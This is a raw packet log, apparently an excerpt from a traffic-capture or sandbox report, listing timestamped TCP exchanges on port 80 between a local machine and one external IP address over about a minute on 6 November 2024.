                                                                    Nov 6, 2024 03:37:26.324264050 CET804975137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:26.324497938 CET4975180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:26.477652073 CET4975180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:26.478738070 CET4975280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:26.483464956 CET804975137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:26.483525991 CET4975180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:26.483944893 CET804975237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:26.484038115 CET4975280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:26.484267950 CET4975280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:26.489156008 CET804975237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:26.830780029 CET4975280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:26.835731030 CET804975237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:27.287305117 CET804975237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:27.328741074 CET4975280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:27.364610910 CET804975237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:27.480503082 CET4975280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:27.481355906 CET4975380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:27.485656023 CET804975237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:27.485707998 CET4975280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:27.486140013 CET804975337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:27.486211061 CET4975380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:27.486308098 CET4975380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:27.491035938 CET804975337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:27.844511032 CET4975380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:27.849415064 CET804975337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:28.298870087 CET804975337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:28.371457100 CET804975337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:28.371520042 CET4975380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.494915009 CET4975380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.495728970 CET4975480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.501365900 CET804975337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:28.501847029 CET804975437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:28.501900911 CET4975380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.501926899 CET4975480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.502032995 CET4975480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.507982016 CET804975437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:28.686996937 CET4975580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.687108040 CET4975480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.691878080 CET804975537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:28.693464994 CET4975580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.693620920 CET4975580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.698385954 CET804975537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:28.733664989 CET804975437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:28.854473114 CET4975680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.860970020 CET804975637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:28.861680031 CET4975680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.861772060 CET4975680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:28.868571043 CET804975637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:29.047674894 CET4975580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:29.052542925 CET804975537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:29.052719116 CET804975537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:29.095794916 CET804975437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:29.095860004 CET4975480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:29.219716072 CET4975680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:29.224575043 CET804975637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:29.504090071 CET804975537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:29.574538946 CET804975537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:29.574629068 CET4975580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:29.680751085 CET804975637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:29.754108906 CET804975637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:29.754168987 CET4975680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:30.064847946 CET4975580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:30.065035105 CET4975680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:30.066140890 CET4975780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:30.070477009 CET804975537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:30.070521116 CET4975580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:30.070950985 CET804975637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:30.070997953 CET804975737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:30.071017027 CET4975680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:30.071063042 CET4975780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:30.071151972 CET4975780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:30.076019049 CET804975737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:30.422591925 CET4975780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:30.427700996 CET804975737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:30.884957075 CET804975737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:30.958198071 CET804975737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:30.958264112 CET4975780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:31.088269949 CET4975880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:31.093158960 CET804975837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:31.095335960 CET4975880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:31.095452070 CET4975880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:31.100366116 CET804975837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:31.453897953 CET4975880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:31.458772898 CET804975837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:31.896694899 CET804975837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:52.578927994 CET4978080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:52.583915949 CET804978037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:52.848625898 CET804977937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:52.922964096 CET804977937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:52.923029900 CET4977980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:53.036077976 CET804978037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:53.109078884 CET804978037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:53.109177113 CET4978080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:53.232100010 CET4977980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:53.232193947 CET4978080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:53.232995033 CET4978180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:53.237409115 CET804977937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:53.237464905 CET804978037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:53.237478971 CET4977980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:53.237513065 CET4978080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:53.237802029 CET804978137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:53.237860918 CET4978180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:53.237962961 CET4978180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:53.242707968 CET804978137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:53.594628096 CET4978180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:53.599555016 CET804978137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:54.057194948 CET804978137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:54.136538029 CET804978137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:54.136600018 CET4978180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:54.673333883 CET4978180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:54.678076982 CET4978280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:54.678554058 CET804978137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:54.678613901 CET4978180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:54.682950020 CET804978237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:54.683026075 CET4978280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:54.683142900 CET4978280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:54.688930035 CET804978237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:55.032087088 CET4978280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:55.037039042 CET804978237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:55.518467903 CET804978237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:55.587086916 CET804978237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:55.587212086 CET4978280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:55.735797882 CET4978280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:55.736460924 CET4978380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:55.741123915 CET804978237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:55.741188049 CET4978280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:55.741271019 CET804978337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:55.741327047 CET4978380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:55.741463900 CET4978380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:55.746243954 CET804978337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:56.094501972 CET4978380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:56.099457026 CET804978337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:56.569845915 CET804978337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:56.643273115 CET804978337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:56.643364906 CET4978380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:57.201611042 CET4978380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:57.207009077 CET804978337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:57.207055092 CET4978380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:57.345132113 CET4978580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:57.350073099 CET804978537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:57.350158930 CET4978580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:57.352922916 CET4978580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:57.357661963 CET804978537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:57.704194069 CET4978580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:57.709144115 CET804978537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:57.939480066 CET4978680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:57.939676046 CET4978580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:57.944410086 CET804978637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:57.944479942 CET4978680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:57.944560051 CET4978680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:57.944894075 CET804978537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:57.944945097 CET4978580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:57.949331045 CET804978637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:58.059169054 CET4978780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:58.064007998 CET804978737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:58.065107107 CET4978780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:58.065220118 CET4978780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:58.070027113 CET804978737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:58.297629118 CET4978680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:58.302515984 CET804978637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:58.302553892 CET804978637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:58.422774076 CET4978780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:58.427925110 CET804978737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:58.759608030 CET804978637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:58.827132940 CET804978637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:58.829389095 CET4978680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:58.876014948 CET804978737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:58.951745987 CET804978737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:58.952383041 CET4978780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:59.081052065 CET4978680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:59.081300974 CET4978780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:59.081924915 CET4978980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:59.086512089 CET804978637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:59.086570978 CET4978680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:59.087331057 CET804978737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:59.087383986 CET4978780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:59.087421894 CET804978937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:59.087491989 CET4978980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:59.087606907 CET4978980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:59.092436075 CET804978937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:59.438267946 CET4978980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:37:59.443100929 CET804978937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:59.899265051 CET804978937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:59.976402998 CET804978937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:37:59.976488113 CET4978980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:00.335611105 CET4979080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:00.340527058 CET804979037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:00.340607882 CET4979080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:00.340729952 CET4979080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:00.345604897 CET804979037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:00.688280106 CET4979080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:00.693140030 CET804979037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:01.167135000 CET804979037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:01.246028900 CET804979037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:01.246130943 CET4979080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:01.405355930 CET4979080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:01.405937910 CET4979680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:01.410780907 CET804979637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:01.410805941 CET804979037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:01.410882950 CET4979680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:01.410912037 CET4979080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:01.411005020 CET4979680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:01.415767908 CET804979637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:01.766426086 CET4979680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:01.771352053 CET804979637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:02.220505953 CET804979637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:02.300837994 CET804979637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:02.300937891 CET4979680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:02.591268063 CET4979680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:02.593350887 CET4980280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:02.596541882 CET804979637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:02.596611023 CET4979680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:02.598258018 CET804980237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:02.598381996 CET4980280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:02.599716902 CET4980280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:02.604485035 CET804980237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:02.959175110 CET4980280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:02.964076996 CET804980237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:03.401977062 CET804980237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:03.453810930 CET4980280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:03.480639935 CET804980237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:03.656929016 CET4980280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:03.715004921 CET4978980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:03.715120077 CET4975780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:03.715711117 CET4980280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:03.716461897 CET4980880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:03.721393108 CET804980837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:03.721477985 CET4980880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:03.721577883 CET4980880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:03.722378016 CET804980237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:03.722433090 CET4980280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:03.726807117 CET804980837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:03.845896006 CET4980980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:03.850851059 CET804980937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:03.850933075 CET4980980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:03.851068974 CET4980980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:03.855865955 CET804980937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:04.079330921 CET4980880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:04.084388971 CET804980837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:04.203969955 CET4980980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:04.208929062 CET804980937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:04.209043026 CET804980937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:04.534209013 CET804980837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:04.602958918 CET804980837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:04.603043079 CET4980880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:04.603753090 CET4980980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:04.609467030 CET804980937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:04.609533072 CET4980980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:04.775305986 CET4980880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:04.777403116 CET4981580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:04.781102896 CET804980837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:04.781172037 CET4980880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:04.782337904 CET804981537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:04.782427073 CET4981580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:04.782592058 CET4981580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:04.787358046 CET804981537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:05.141393900 CET4981580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:05.146311998 CET804981537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:05.594321966 CET804981537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:05.664218903 CET804981537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:05.664338112 CET4981580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:06.161720037 CET4982180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:06.166667938 CET804982137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:06.166748047 CET4982180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:06.166851044 CET4982180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:06.171668053 CET804982137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:06.516539097 CET4982180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:06.521497965 CET804982137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:06.976986885 CET804982137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:07.056188107 CET804982137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:07.056250095 CET4982180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:07.169464111 CET4982180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:07.170411110 CET4982780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:07.174953938 CET804982137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:07.175306082 CET804982737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:07.175370932 CET4982180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:07.175409079 CET4982780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:07.175524950 CET4982780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:07.180275917 CET804982737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:07.532018900 CET4982780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:07.536803961 CET804982737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:07.986022949 CET804982737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:08.062239885 CET804982737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:08.062345982 CET4982780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:08.322726965 CET4982780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:08.322731972 CET4981580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:08.323015928 CET4983380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:08.327781916 CET804983337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:08.327853918 CET4983380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:08.327903032 CET804982737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:08.327939987 CET4983380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:08.327949047 CET4982780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:08.333163977 CET804983337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:08.673830986 CET4983380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.003182888 CET4994980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.008472919 CET804994837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.008482933 CET804994837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.008491039 CET804994937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.468159914 CET804994937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.499973059 CET804994837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.531955957 CET4994980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.547694921 CET804994937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.577785015 CET804994837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.577851057 CET4994880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.719635010 CET4994980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.817426920 CET804994837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.817544937 CET4994880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.817550898 CET804994937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.817600965 CET4994980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.869066954 CET4994880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.869138002 CET4994980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.869807959 CET4995580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.874211073 CET804994837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.874270916 CET4994880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.874557018 CET804995537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.874578953 CET804994937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:28.874614000 CET4995580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.874634981 CET4994980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.874754906 CET4995580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:28.879489899 CET804995537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:29.219631910 CET4995580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:29.224476099 CET804995537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:29.685631990 CET804995537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:29.750787973 CET4995580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:29.759912014 CET804995537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:29.891747952 CET4995580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:29.892436028 CET4996380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:29.896918058 CET804995537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:29.896971941 CET4995580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:29.897164106 CET804996337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:29.897265911 CET4996380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:29.897387028 CET4996380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:29.902158022 CET804996337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:30.250782967 CET4996380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:30.255758047 CET804996337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:30.713701963 CET804996337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:30.786015034 CET804996337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:30.787410975 CET4996380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:31.070871115 CET4996380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:31.072952986 CET4996980192.168.2.437.44.238.250
